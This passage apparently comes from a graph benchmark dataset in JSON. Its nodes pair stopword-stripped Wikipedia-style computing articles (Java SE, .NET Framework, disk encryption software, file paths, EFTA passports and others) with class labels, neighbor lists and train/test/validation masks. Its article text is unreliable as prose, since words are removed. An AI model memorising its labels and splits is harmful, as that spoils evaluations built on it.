      8316,
      8829,
      11391,
      3712,
      10373,
      9350,
      6301,
      2208,
      2215,
      10921,
      3248,
      7857,
      690,
      5810,
      8880,
      8882,
      6338,
      7877,
      6860,
      4305,
      2259,
      4311,
      1250,
      8423,
      5872,
      2304,
      4358,
      8455,
      4364,
      10526,
      4383,
      5938,
      9011,
      5943,
      7991,
      7485,
      321,
      7492,
      3920,
      1363,
      3416,
      4960,
      10080,
      5987,
      10599,
      2925,
      9078,
      3966,
      910,
      8597,
      5031,
      6067,
      6074,
      10683,
      10684,
      6589,
      3519,
      5567,
      9665,
      10187,
      10193,
      3542,
      992,
      5095,
      3560,
      10215,
      3562,
      7146,
      5612,
      495,
      11254,
      9207,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 3562,
    "label": 9,
    "text": "Java_Platform,_Standard_Edition:java platform standard edition java platform standard edition java se computing platform development deployment portable code desktop server environments java se formerly known java 2 platform standard edition j2se platform uses java programming language part java software-platform family java se defines range general-purpose apis—such java apis java class library—and also includes java language specification java virtual machine specification one well-known implementations java se oracle corporation java development kit jdk platform known java 2 platform standard edition j2se version 1.2 name changed java platform standard edition java se version 1.5 se used distinguish base platform enterprise edition java ee micro edition java platforms 2 originally intended emphasize major changes introduced version 1.2 removed version 1.6 naming convention changed several times java version history starting j2se 1.4 merlin java se developed java community process produces descriptions proposed final specifications java platform called java specification requests jsr jsr 59 umbrella specification j2se 1.4 jsr 176 specified j2se 5.0 tiger java se 6 mustang released jsr 270 java platform enterprise edition java ee related specification includes classes java se plus number useful programs run servers opposed workstations java platform micro edition java related specification intended provide certified collection java apis development software small resource-constrained devices cell phones pdas set-top boxes java runtime environment jre java development kit jdk actual files downloaded installed computer run develop java programs respectively java package contains fundamental classes interfaces closely tied language runtime system includes root classes form class hierarchy types tied language definition basic exceptions math functions threading security functions well information underlying native system package contains 22 32 codice_1 classes provided jdk 6 main classes interfaces codice_2 classes codice_2 automatically imported every source file package provides flexible types references otherwise available permitting limited interaction application java virtual machine jvm garbage collector important package central enough language language designers give name starts java.lang somewhat special-purpose used lot developers package added j2se 1.2 java expressive system references allows special behavior garbage collection normal reference java known strong reference codice_7 package defines three types references—soft weak phantom references type reference designed specific use reference types extends class provides method return strong reference referent object codice_8 reference cleared reference type phantom method clear reference codice_7 also defines class used applications discussed keep track objects changed reference type codice_10 created optionally registered reference queue application polls reference queue get references changed reachability state reflection constituent java api lets java code examine reflect java components runtime use reflected members classes package along codice_11 accommodate applications debuggers interpreters object inspectors class browsers services object serialization javabeans need access either public members target object based runtime class members declared given class package added jdk 1.1 reflection used instantiate classes invoke methods using names concept allows dynamic programming classes interfaces methods fields constructors discovered used runtime reflection supported metadata jvm program basic techniques involved reflection discovery typically starts object calling method get object codice_12 codice_12 object several methods discovering contents class example codice_12 object obtained either discovery using class literal e.g codice_19 using name class e.g codice_12 object member codice_21 codice_22 codice_23 objects obtained using symbolic name member example codice_21 codice_22 codice_23 objects used dynamically access represented member class example codice_46 package also provides class contains static methods creating manipulating array objects since j2se 1.3 class supports dynamic creation proxy classes implement specified interfaces implementation codice_47 class provided supplied object implements interface codice_48 method called method invoked proxy object—the first parameter proxy object second parameter codice_21 object representing method interface implemented proxy third parameter array parameters passed interface method codice_39 method returns codice_32 result contains result returned code called proxy interface method package contains classes support input output classes package primarily stream-oriented however class random access files also provided central classes package abstract base classes reading writing byte streams respectively related classes abstract base classes reading writing character streams respectively package also miscellaneous classes support interactions host file system stream classes follow decorator pattern extending base subclass add features stream classes subclasses base stream classes typically named one following attributes stream subclasses named using naming pattern codice_52 codice_53 name describing feature codice_54 one codice_55 codice_56 codice_57 codice_58 following table shows sources/destinations supported directly codice_59 package standard library packages provide stream implementations destinations codice_55 returned method java ee class data type handling processing filtering stream data accomplished stream filters filter classes accept another compatible stream object parameter constructor decorate enclosed stream additional features filters created extending one base filter classes codice_57 codice_58 classes really byte streams additional processing performed data stream convert bytes characters use default character encoding platform j2se 5.0 represented returned static method class converts codice_55 codice_57 class converts codice_56 codice_58 classes constructors support specifying character encoding use encoding specified program uses default encoding platform following table shows processes filters codice_59 package directly supports classes extend corresponding codice_68 class class supports random access reading writing files class uses file pointer represents byte-offset within file next read write operation file pointer moved implicitly reading writing explicitly calling methods current position file pointer returned method class represents file directory path file system codice_69 objects support creation deletion renaming files directories manipulation file attributes read-only last modified timestamp codice_69 objects represent directories used get list contained files directories class file descriptor represents source sink destination bytes typically file also console network socket codice_71 objects used create codice_69 streams obtained codice_69 streams codice_74 sockets datagram sockets j2se 1.4 package nio non-blocking i/o added support memory-mapped i/o facilitating i/o operations closer underlying hardware sometimes dramatically better performance codice_75 package provides support number buffer types subpackage provides support different character encodings character data subpackage provides support channels represent connections entities capable performing i/o operations files sockets codice_76 package also provides support fine-grained locking files package supports multiprecision arithmetic including modular arithmetic operations provides multiprecision prime number generators used cryptographic key generation main classes package package provides special io routines networks allowing http requests well common transactions package implements parsing routines strings supports various human-readable languages locale-specific parsing data structures aggregate objects focus package included package collections api organized data structure hierarchy influenced heavily design patterns considerations created support java applet creation package lets applications downloaded network run within guarded sandbox security restrictions easily imposed sandbox developer example may apply digital signature applet thereby labeling safe allows user grant applet permission perform restricted operations accessing local hard drive removes sandbox restrictions digital certificates issued certificate authorities included package various classes developing manipulating beans reusable components defined javabeans architecture architecture provides mechanisms manipulating properties components firing events properties change apis codice_80 intended use bean editing tool beans combined customized manipulated one type bean editor gui designer integrated development environment abstract window toolkit provides access basic set gui widgets based underlying native platform widget set core gui event subsystem interface native windowing system java application also provides several basic layout managers datatransfer package use clipboard drag drop interface input devices mice keyboards well access system tray supporting systems package along codice_81 contains largest number enums 7 jdk 6 package provides java remote method invocation support remote procedure calls two java applications running different jvms support security including message digest algorithm included package implementation jdbc api used access sql databases grouped package package provides support remote communication applications using rmi iiop protocol protocol combines rmi corba features java se core technologies corba rmi-iiop swing collection routines build codice_82 provide platform independent widget toolkit uses 2d drawing routines render user interface components instead relying underlying native operating system gui support package contains largest number classes 133 jdk 6 package along codice_82 also contains largest number enums 7 jdk 6 supports pluggable looks feels plafs widgets gui imitate underlying native system design patterns permeate system especially modification model-view-controller pattern loosens coupling function appearance one inconsistency j2se 1.3 fonts drawn underlying native system java limiting text portability workarounds using bitmap fonts exist general layouts used keep elements within aesthetically consistent gui across platforms package provides error tolerant html parser used writing various web browsers web bots package contains largest number annotation types 30 jdk 6 defines annotations customizing java program elements xml schema mapping package provides support remote communication applications using general inter-orb protocol supports features common object request broker architecture rmi rmi-iiop package calling remote methods objects virtual machines usually via network package contains largest number codice_84 classes 45 jdk 6 communication possibilities corba portable various languages however comes complexity package contains largest number interfaces 39 jdk 6 provides mechanism register orb hooks orb services intercept normal flow execution orb several critical security vulnerabilities reported recent january 2013 security alerts oracle announce critical security-related patches java se",
    "neighbors": [
      3076,
      517,
      7176,
      4107,
      6168,
      541,
      9762,
      5158,
      5677,
      2106,
      572,
      7750,
      2658,
      1128,
      1136,
      8825,
      3705,
      10877,
      3712,
      4747,
      155,
      6813,
      10413,
      9913,
      6338,
      5323,
      6860,
      7894,
      2778,
      219,
      9441,
      1250,
      5357,
      5872,
      2304,
      4358,
      6427,
      10526,
      2339,
      7983,
      9011,
      1332,
      7485,
      4423,
      3920,
      1363,
      2901,
      4960,
      5987,
      3954,
      9078,
      3966,
      2432,
      910,
      5521,
      11674,
      5031,
      6067,
      2485,
      6074,
      10683,
      10684,
      3519,
      3008,
      5567,
      9665,
      10187,
      10193,
      4052,
      993,
      7143,
      3560,
      3561,
      7146,
      4589,
      9714,
      3571,
      2556,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 3563,
    "label": 2,
    "text": "NeXT_character_set:next character set next character set often aliased nextstep encoding vector we8nextstep next-multinational used nextstep openstep operating systems next workstations beginning 1988 based adobe systems postscript ps character set aka adobe standard encoding unused code points filled characters iso 8859-1 latin 1 although differing code points following table shows next character set character shown potential unicode equivalent code points differing adobe standard encoding shown boxed codepoints 00 0 7f 127 nearly identical ascii",
    "neighbors": [
      5384,
      2281,
      7806,
      7307,
      11151,
      7504,
      3443,
      8628,
      2078,
      3708,
      350
    ],
    "mask": "Train"
  },
  {
    "node_id": 3564,
    "label": 5,
    "text": "Reliable_Data_Protocol:reliable data protocol reliable data protocol rdp network transport protocol defined rfc 908 updated rfc 1151 meant provide facilities remote loading debugging bulk transfer images data reliable data protocol located transport layer osi model next protocols like tcp udp number 27 list ip protocol numbers similar tcp reliable data protocol connection oriented contrary tcp require sequenced delivery segments reliable data protocol gained popularity though experimental implementations bsd exist",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9251,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 3565,
    "label": 6,
    "text": "IOzone:iozone iozone file system benchmark utility originally made william norcott enhanced capps others.. source code available iozone.org mmap file i/o uses posix threads 2007 infoworld bossie awards best file i/o tool windows version iozone uses cygwin builds available aix bsdi hp-ux irix freebsd linux openbsd netbsd osfv3 osfv4 osfv5 sco openserver solaris mac os x windows 95/98/me/nt/2k/xp available test profile phoronix test suite",
    "neighbors": [
      2081,
      10658,
      2424,
      3462,
      10920,
      10601,
      3882,
      9964,
      823,
      4465,
      499,
      1461,
      2070,
      1911,
      1304,
      7836,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3566,
    "label": 4,
    "text": "Passports_of_the_EFTA_member_states:passports efta member states passports issued european free trade association efta member states iceland liechtenstein norway switzerland used citizens exercise right free movement within efta european economic area eea consists iceland liechtenstein norway addition member states european union instead part eea switzerland series bilateral agreements eu european single market consequently extended exceptions efta member states efta member states also signatories schengen agreement part schengen area citizens efta member states generally rights eu citizens eea countries treated eu citizens purposes travel entry eea countries going border controls enter efta eea member state efta eu citizens possessing valid biometric passports sometimes able use automated gates instead immigration counters whilst citizens using national identity card non-biometric passport non-eea citizens must use immigration counter anyone travelling children must also use immigration counter note efta organisation issue rules passport design validity four countries european union schengen regulations besides global icao regulations efta article used common name countries international civil aviation organization icao issues passport standards treated recommendations national governments size passport booklets normally complies iso/iec 7810 id-3 standard specifies size size b7 format passport cards issued id-1 credit card sized standard efta member states except liechtenstein icao members liechtenstein delegated switzerland implement treaty make applicable territory liechtenstein according council regulation ec 2252/2004 passports travel documents issued schengen member states shall comply minimum security standards passports must incorporate storage medium chip contains holder facial image fingerprints obligation apply identity cards temporary passports travel documents validity one year less regulation limited harmonization security features addition harmonization security features biometrics member states european union started harmonise aspects designs ordinary passports types passports diplomatic service emergency passports passports issued eu member states common recommended lay burgundy colour words “ european union ” followed name country efta member states norway passport burgundy color however coat arms placed name issuing state norway instead name state word passport eu passports iceland liechtenstein hand follows order eu passports issues blue ordinary passports burgundy passports travel document shall contain machine-readable biographical data page shall comply part 1 machine-readable passports icao document 9303 way issued shall comply specifications machine-readable passports set therein newer efta passports contain machine-readable zone contains name nationality information identification page designed way computers fairly easily read information although still human readable since contains letters a–z digits space character bar graph similar apostrophes similar omitted hyphens spaces replaced angle bracket diacritical marks permitted mrz even though may useful distinguish names use diacritical marks mrz could confuse machine-reading equipment names containing non-english letters usually spelled correct way visual non-machine-readable zone passport mapped a-z according standards international civil aviation organization icao machine-readable zone following mapping specified languages efta countries å → aa æ → ae ä → ae ð → ø → oe ö → oe ß → ss þ → th ü → ue letters accents otherwise replaced simple letters françois becomes francois etc. example german names müller becomes mueller groß becomes gross gößmann becomes goessmann icao mapping mostly used computer-generated internationally used documents air tickets sometimes like us visas also simple letters used muller gossmann three possible spelling variants name e.g müller mueller muller different documents sometimes lead confusion use two different spellings within document like passports german-speaking countries may give people unfamiliar foreign orthography impression document forgery recommended use spelling used machine-readable passport zone visas airline tickets etc. refer zone questioned thing applies name long fit airline ticket system otherwise problems arise machine-readable room 39 letters name visual zone contain many fit icelandic passports blue icelandic coat arms emblazoned centre front cover words ísland icelandic iceland english islande french inscribed coat arms words vegabréf icelandic passport english passeport french inscribed coat arms icelandic passports standard biometric symbol bottom vegabréf literally means road letter word used scandinavia historic centuries meaning internal passport icelandic passport includes following data information page ends machine readable zone liechtenstein passports blue coat arms liechtenstein emblazoned centre words fürstentum liechtenstein inscribed coat arms reisepass international biometric passport symbol information page ends machine readable zone regular norwegian passports burgundy colour norway coat arms emblazoned top front cover words norge noreg norway norway bokmål norwegian one two forms norwegian nynorsk norwegian form norwegian english respectively inscribed coat arms word pass passport emblazoned name country new biometric passport standard biometric symbol bottom norwegian passport includes following data information page ends machine-readable zone starting p x x indicates type passport example ordinary passports contain pvnor v presumably means vanlig ordinary norwegian swiss passports red colour words schweizer pass german passeport suisse french passaporto svizzero italian passaport svizzer romansh swiss passport english top right corner swiss equilateral white cross standard biometric symbol placed bottom right hand side swiss passport includes following data full plastic information page information page ends machine readable zone visa requirements administrative entry restrictions authorities states placed citizens european free trade association efta member states efta member states citizens enjoy freedom movement territories accordance efta convention efta nationals also enjoy freedom movement european union eu efta nationals eu citizens visa-exempt legally entitled enter reside countries citizens ’ rights directive also sometimes called free movement directive defines right free movement citizens european economic area eea includes three efta members iceland norway liechtenstein member states eu switzerland member efta eea bound directive rather separate bilateral agreement free movement eu result de facto citizen efta country live work efta countries eu countries citizen eu country live work efta countries voting working sensitive fields government police military citizenship often required non-citizens may rights welfare unemployment benefits citizens efta member states part schengen area area comprising 26 european states officially abolished passport types border control mutual borders area mostly functions single country international travel purposes common visa policy area named schengen agreement since implementation schengen rules border posts closed often entirely removed participating countries pro forma borders subject photo-journalistic art project schengen borders code requires participating states remove obstacles free traffic flow internal borders thus road rail air passengers longer identity checked border guards travelling schengen countries although security controls carriers still permissible travellers still bring passport national identity card one may required alternative holding passport valid national identity card also used exercise right free movement within eea switzerland strictly speaking necessary eea swiss citizen possess valid passport national identity card enter eea switzerland theory eea swiss citizen outside eea switzerland prove his/her nationality means e.g presenting expired passport national identity card citizenship certificate he/she must permitted enter eea switzerland eea swiss citizen unable demonstrate his/her nationality satisfactorily must nonetheless given 'every reasonable opportunity obtain necessary documents delivered within reasonable period time states schengen area strengthened border controls non-schengen countries participating countries required apply strict checks travellers entering exiting schengen area checks co-ordinated european union frontex agency subject common rules details border controls surveillance conditions permission enter schengen area may granted exhaustively detailed schengen borders code. ref name= reg2016/399 regulation eu 2016/399 european parliament council 9 march 2016 union code rules governing movement persons across borders schengen borders code oj l 77 23 march 2016 p. 1 /ref part schengen area reciprocity required comes visa free access since 2001 european union issued two lists regarding visas schengen area white list countries whose nationals require visas annex ii black list countries whose nationals require visas annex per regulation 539/2001 amended regulation 1289/2013 reciprocity required annex ii countries territories means countries must offer visa-free access 90 days citizens 26 schengen member states passport rankings number countries territories holders could visit without visa obtaining visa arrival 2018 follows sourced henley partners passport index 2018 norway allows citizens one passport circumvent certain travel restrictions useful wanting travel passport remains consulate visa application processed wanting apply visas already foreign country also needed circumvent fact visitors whose passports show evidence visit israel allowed enter iran iraq lebanon libya saudi arabia sudan syria yemen however possible get israeli entry exit stamp separate piece paper since efta member state make citizenship laws dual citizenship always possible efta countries iceland allows dual multiple citizenship without restrictions switzerland regulate/restrict conditions naturalization immigrants vary regionally norway allow exceptional cases liechtenstein citizens descent foreigners wanting naturalize citizen efta member state live work efta- eu member states necessarily vote work sensitive fields government police military citizenship often required non-citizens may rights welfare unemployment benefits citizens",
    "neighbors": [
      8270,
      10685,
      3566
    ],
    "mask": "Test"
  },
  {
    "node_id": 3567,
    "label": 9,
    "text": "Wolfram_SystemModeler:wolfram systemmodeler wolfram systemmodeler developed wolfram mathcore platform engineering well life-science modeling simulation based modelica language provides interactive graphical modeling simulation environment customizable set component libraries features wolfram systemmodeler include wolfram systemmodeler primary interface model center interactive graphical environment including customizable set component libraries models developed model center simulated simulation center software also provides tight integration mathematica environment users develop simulate document analyze wolfram systemmodeler models within mathematica notebooks software used engineering field well life sciences originally developed mathcore engineering mathmodelica acquired wolfram research march 30 2011 re-released wolfram systemmodeler may 23 2012 improved integration wolfram mathematica wolfram systemmodeler uses free object-oriented modeling language modelica language designed modeling physical systems designed support library development model exchange modern language built acausal modeling mathematical equations object-oriented constructs facilitate reuse modeling knowledge since version 11.3 wolfram language supports direct access modelica libraries system simulation analysis notebook interface",
    "neighbors": [
      9376,
      8162,
      1443,
      11555,
      4454,
      5319,
      5830,
      6408,
      587,
      10764,
      6797,
      7069,
      7983,
      8113,
      6450,
      823,
      1917
    ],
    "mask": "Test"
  },
  {
    "node_id": 3568,
    "label": 7,
    "text": "Beqom:beqom beqom global provider compensation management software delivered using cloud computing platform beqom global headquarters nyon switzerland offices throughout north america emea components software include functionality manage sales incentives bonuses equity merit pay long term incentives channel partner incentives beqom founded excentive international 2009 software executives coming hyperion outlooksoft sap company gained notability 2009 one hr software vendors offering comprehensive compensation application year company began worldwide expansion opening north american headquarters september 1 2013 company changed name beqom july 2014 swisscom ventures investing arm swisscom ag renaissance pme swiss pension investing fund managed swiss technology investor vinci capital announced completed financing round beqom help fund international expansion efforts",
    "neighbors": [
      4194,
      5210
    ],
    "mask": "Test"
  },
  {
    "node_id": 3569,
    "label": 9,
    "text": "CS-Script:cs-script cs-script free open-source scripting platform enables creating scripts ecma-compliant c syntax scripts access .net framework mono apis cs-script offers standalone script execution well hosting script engine clr apps newer edition product called cs-script.core works .net core existing .net development tools e.g visual studio sharp develop used allowing editing debugging scripts within traditional .net-aware development environments additionally cs-script support added notepad++ visual studio code via plugins flashdevelop uses cs-script internal scripting engine bring script engine file 100 kb size system .net runtime installed script run scripts run system clr installed including mono cs-script truly object-oriented language supports vb.net c++/cli j .net functionality available including fcl com interop remoting wpf wcf easily available debugger rich ide visual studio third-party ides execution model within script .net application static void main interpretation statement script done even statement frequently used throughout code strong typing luxury available scripting languages software development tasks done language gui development script application becomes easy scripting system extended using new assemblies written .net languages com components script easily converted application vice versa functionality clr application extended scripting run within wsh mixed one wsf file external links",
    "neighbors": [
      5952,
      9780,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 3570,
    "label": 1,
    "text": "Dynaset:dynaset 1 dynaset short dynamic set set data dynamically linked back database instead query result stored temporary table data updated directly user dynaset allows user view update data contained dynaset thus university lecturer queried students received distinction assignment found error student record would need update data dynaset would automatically update student database record without need send specific update query storing query results temporary table concept initially put forth dr. e.f. codd inventor relational database management system rdbms concept 2 dynaset temporary set data taken one tables underlying file dynaset may query defined access database single table subset table result joining multiple tables dynaset updated file locked opened readonly data dynaset live i.e. changes made data project visual basic executing appear corresponding recordset note dynasets created joining tables typically non-updateable word dynaset coined david risher design meeting microsoft access 1.0",
    "neighbors": [
      5401,
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3571,
    "label": 6,
    "text": "Path_(computing):path computing path general form name file directory specifies unique location file system path points file system location following directory tree hierarchy expressed string characters path components separated delimiting character represent directory delimiting character commonly slash backslash character colon though operating systems may use different delimiter paths used extensively computer science represent directory/file relationships common modern operating systems essential construction uniform resource locators urls resources represented either absolute relative paths multics first introduced hierarchical file system directories separated mid-1960s around 1970 unix introduced slash character directory separator 1981 first version microsoft dos released ms-dos 1.0 support file directories also major portion utility commands packaged ms-dos 1.0 came ibm command line syntax used slash character 'switch prefix example codice_1 runs codice_2 command wide list format option use slash still found command interface microsoft windows contrast unix uses dash character command line switch prefix directory support added ms-dos version 2.0 kept switch prefix character backwards compatibility microsoft chose backslash character directory separator looks similar slash character absolute full path points location file system regardless current working directory must include root directory contrast relative path starts given working directory avoiding need provide full absolute path filename considered relative path based current working directory working directory file parent directory file found error result file addressed name japanese korean versions windows may often display '¥ character '₩ character instead directory separator cases code backslash drawn characters early versions ms-dos replaced backslash glyphs display make possible display programs understood 7-bit ascii characters square brackets replaced well see iso 646 windows codepage 932 japanese shift jis codepage 949 korean although even first version windows supported 8-bit iso-8859-1 character set yen sign u+00a5 modern versions windows supports unicode sign u+20a9 much software continue display backslashes found ascii files way preserve backwards compatibility mac os x derivative unix uses unix paths internally however preserve compatibility software familiarity users many portions gui switch typed user internally switch back displaying filenames entered user also changed inverse translation happen programming languages also use paths e.g file opened programming languages use path representation underlying operating system direct access operating system paths hinder portability programs support portable programs java uses file.separator distinguish separated paths seed7 different approach path representation seed7 paths use unix path convention independent operating system windows mapping takes place e.g path /c/users mapped c \\users microsoft windows unc short universal naming convention uniform naming convention specifies common syntax describe location network resource shared file directory printer unc syntax windows systems generic form microsoft often refers network path microsoft windows interfaces also allow require unc syntax webdav share access rather url unc syntax extended optional components denote use ssl tcp/ip port number webdav url codice_5 becomes viewed remotely sharedfolder may name different program server sees opening \\sharedfolder instead sharedfolder name consists arbitrary name assigned folder defining sharing microsoft windows interfaces also accept long unc microsoft windows uses following types paths versions windows prior windows xp apis accept long device paths could accept 260 characters shell windows xp windows vista explorer.exe allows path names 248 characters long since uncs start two backslashes backslash also used string escaping regular expressions result extreme cases leaning toothpick syndrome escaped string regular expression matching unc begins 8 backslashes – codice_11 – string regular expression require escaping simplified using raw strings c codice_12 python codice_13 regular expression literals perl codice_14 unix-like systems use similar syntax posix allows treating path beginning two slashes implementation-defined manner though cases systems must treat multiple slashes single slashes many applications unix-like systems example scp rcp rsync use resource definitions like urls service name 'smb following worked example discusses behavior unix-style file system would appear terminal terminal application command-line window attached current working directory cwd one wants change current working directory moment relative path desired directory represented short absolute path directory given bobapples relative path directory wanted following may typed command prompt change current working directory bobapples two dots point upwards hierarchy indicate parent directory one dot represents current directory components complex relative path e.g. alone first component relative path represents working directory using refer file current working directory sometimes usefully distinguish resource found default directory means example view specific version manual page instead one installed system contrary popular belief windows system api accepts slash thus unix examples work many applications windows interpret slash purposes treat invalid character thus require enter backslash — notably cmd.exe shell often called terminal typically runs terminal window note many shells available windows tcsh windows powershell allow slash addition indicate single root instead root current disk indicating file disk current one requires prefixing drive letter colon ambiguity ensues colon valid character ms-dos filename thus one file called current directory unc names path starting support slashes following examples show ms-dos/windows-style paths backslashes used match common syntax path points file name located directory turn located root directory drive path refers file called located parent directory current directory drive path denotes file called located directory turn located directory located current directory current drive since example gives drive-specification rather simple path points file named codice_15 located current directory since path lacks directory-specification current drive since drive specification present path refers first serial port com1 example uses path containing slashes directory separator command redirects content file codice_16 command path containing forward slashes often needs surrounded double quotes disambiguate command line switches cd drive letter /program files work root drive letter directory appears treat forward slashes .\\ example works also root folder would treated relative path directory name specified forward slashes get following error setting environment variables sometimes necessary provide path contain spaces instance defined c \\program files\\java ... cause scripts halt encounter space path name get eight-character name windows assigns directory substitution environment variables use directory listing command /x option one level target directory instance following get eight character name directories directly root correct way represent path directory trailing slash period posix windows might think paths end trailing slash directories actuality path ending trailing slash represents files within directory simply path file may may directory path directory even may eventually resolve directory",
    "neighbors": [
      2432,
      2945,
      3330,
      9733,
      5383,
      5514,
      6797,
      3856,
      273,
      2193,
      8080,
      5397,
      8988,
      6813,
      7325,
      9762,
      5158,
      7847,
      7975,
      1193,
      10235,
      2221,
      5677,
      7983,
      11442,
      52,
      437,
      1844,
      4919,
      4409,
      9533,
      8767,
      576,
      10561,
      3522,
      10052,
      2120,
      4298,
      9166,
      5969,
      7123,
      10068,
      213,
      6358,
      5975,
      7000,
      7383,
      9946,
      10590,
      2016,
      4320,
      9828,
      1509,
      11621,
      2281,
      3562,
      5225,
      5482,
      6126,
      7663,
      9840,
      5492,
      6772,
      7540,
      9972,
      4601,
      5754,
      3323,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 3572,
    "label": 6,
    "text": "Disk_encryption_software:disk encryption software disk encryption software computer security software protects confidentiality data stored computer media e.g. hard disk floppy disk usb device using disk encryption compared access controls commonly enforced operating system os encryption passively protects data confidentiality even os active example data read directly hardware different os addition crypto-shredding suppresses need erase data end disk lifecycle disk encryption generally refers wholesale encryption operates entire volume mostly transparently user system applications generally distinguished file-level encryption operates user invocation single file group files requires user decide specific files encrypted disk encryption usually includes aspects disk including directories adversary determine content name size file well suited portable devices laptop computers thumb drives particularly susceptible lost stolen used properly someone finding lost device penetrate actual data even know files might present disk data protected using symmetric cryptography key randomly generated disk encryption first established key encrypted way using password pass-phrase known ideally user thereafter order access disk data user must supply password make key available software must done sometime operating system start-up encrypted data used done software disk encryption typically operates level applications system programs low-level device drivers transparently user point view encrypting data produced program physically written disk conversely decrypts data immediately read presented program properly done programs unaware cryptographic operations disk encryption software e.g. truecrypt bestcrypt provide features generally accomplished disk hardware encryption ability mount container files encrypted logical disks file system encrypted logical inner volumes secretly hidden within free space obvious outer volumes strategies provide plausible deniability well-known examples disk encryption software include bitlocker windows filevault apple os/x truecrypt non-commercial freeware application windows os/x linux disk encryption systems veracrypt ciphershed active open source forks discontinued truecrypt project bestcrypt proprietary trialware offers levels plausible deniability might useful user compelled reveal password encrypted volume hidden volumes steganographic feature allows second hidden volume reside within apparent free space visible container volume sometimes known outer volume hidden volume separate file system password encryption key distinct container volume content hidden volume encrypted resides free space file system outer volume—space would otherwise filled random values hidden volume exist outer container brought online thorough disk encryption software whether inner outer volume mounted depends password provided normal password/key outer volume proves valid outer volume mounted password/key hidden volume proves valid existence hidden volume even detected mounted otherwise password/key successfully decrypt either inner outer volume descriptors neither mounted hidden volume created inside visible container volume user store important-looking information user actually mind revealing outer volume whereas sensitive information stored within hidden volume user forced reveal password user reveal password outer volume without disclosing existence hidden volume hidden volume compromised user takes certain precautions overwriting free areas host disk volumes stored file device/partition may intentionally contain discernible signatures unencrypted headers cipher algorithms designed indistinguishable pseudorandom permutation without knowing key presence data encrypted volume also undetectable unless known weaknesses cipher means impossible prove file partition encrypted volume rather random data without password mount characteristic also makes impossible determine volume contains another hidden volume file hosted volume opposed partitions may look place cases since entirely random data placed file intentionally however partition device hosted volume look different partition device wiped common disk wiping tool darik boot nuke one plausibly claim device partition wiped clear personal data portable traveller mode means encryption software run without installation system hard drive mode software typically installs temporary driver portable media since installing driver albeit temporarily administrative privileges still required disk encryption software allows encrypted volumes resized many systems implement fully resort using sparse files achieve encrypted volumes contain header cdb data may backed overwriting data destroy volume ability back useful restoring backup copy data may reset volume password backup taken",
    "neighbors": [
      7040,
      8963,
      647,
      1801,
      5391,
      9745,
      1810,
      1310,
      672,
      9762,
      10405,
      3880,
      7983,
      1456,
      5552,
      11568,
      3382,
      1978,
      7229,
      831,
      6602,
      7244,
      2395,
      3422,
      6494,
      10850,
      11368,
      7794,
      4348,
      4221,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3573,
    "label": 2,
    "text": ".NET_Framework:.net framework .net framework pronounced dot net software framework developed microsoft runs primarily microsoft windows includes large class library named framework class library fcl provides language interoperability language use code written languages across several programming languages programs written .net framework execute software environment contrast hardware environment named common language runtime clr clr application virtual machine provides services security memory management exception handling computer code written using .net framework called managed code fcl clr together constitute .net framework fcl provides user interface data access database connectivity cryptography web application development numeric algorithms network communications programmers produce software combining source code .net framework libraries framework intended used new applications created windows platform microsoft also produces integrated development environment largely .net software called visual studio .net framework began proprietary software although firm worked standardize software stack almost immediately even first release despite standardization efforts developers mainly free open-source software communities expressed unease selected terms prospects free open-source implementation especially regarding software patents since microsoft changed .net development closely follow contemporary model community-developed software project including issuing update patent promising address concerns .net framework led family .net platforms targeting mobile computing embedded devices alternative operating systems web browser plug-ins reduced version framework .net compact framework available windows ce platforms including windows mobile devices smartphones .net micro framework targeted resource-constrained embedded devices silverlight available web browser plugin mono available many operating systems customized popular smartphone operating systems android ios game engines .net core targets universal windows platform uwp cross-platform cloud computing workloads microsoft began developing .net framework late 1990s originally name next generation windows services ngws part .net strategy late 2000 first beta versions .net 1.0 released august 2000 microsoft intel worked standardize common language infrastructure cli c december 2001 ratified ecma international ecma standards international organisation standardisation iso followed april 2003 current version iso standards iso/iec 23271:2012 iso/iec 23270:2006 microsoft partners hold patents cli c ecma iso require patents essential implementation made available reasonable non-discriminatory terms firms agreed meet terms make patents available royalty-free however apply part .net framework covered ecma-iso standards included windows forms ado.net asp.net patents microsoft holds areas may deterred non-microsoft implementations full framework october 3 2007 microsoft announced source code .net framework 3.5 libraries become available microsoft reference source license ms-rsl source code repository became available online january 16 2008 included bcl asp.net ado.net windows forms wpf xml scott guthrie microsoft promised linq wcf wf libraries added november 12 2014 microsoft announced .net core effort include cross-platform support .net source release microsoft coreclr implementation source entire … library stack .net core adoption conventional bazaar -like open-source development model consolation stewardship .net foundation miguel de icaza describes .net core redesigned version .net based simplified version class libraries microsoft immo landwerth explained .net core would foundation future .net platforms time announcement initial release .net core project seeded subset libraries source code coincided relicensing microsoft existing .net reference source away restrictions ms-rsl landwerth acknowledged disadvantages formerly selected shared license explaining made codename rotor non-starter community-developed open source project meet criteria open source initiative osi approved license november 2014 microsoft also produced update patent grants extends scope beyond prior pledges prior projects like mono existed legal grey area microsoft earlier grants applied technology covered specifications including strictly 4th editions ecma-334 ecma-335 new patent promise however places ceiling specification version even extends .net runtime technologies documented msdn formally specified ecma group project chooses implement allows mono projects maintain feature parity modern .net features introduced since 4th edition published without risk patent litigation implementation features new grant maintain restriction implementation must maintain minimum compliance mandatory parts cli specification march 31 2016 microsoft announced microsoft build completely relicense mono mit license even scenarios formerly commercial license needed microsoft also supplemented prior patent promise mono stating assert applicable patents parties using selling offering sale importing distributing mono announced mono project contributed .net foundation developments followed acquisition xamarin began february 2016 finished march 18 2016 microsoft press release highlights cross-platform commitment allows fully open-source modern server-side .net stack microsoft released source code wpf windows forms winui december 4 2018 may 8th 2019 microsoft announced .net 5.0 released november 2020 based .net core common language infrastructure cli provides language-neutral 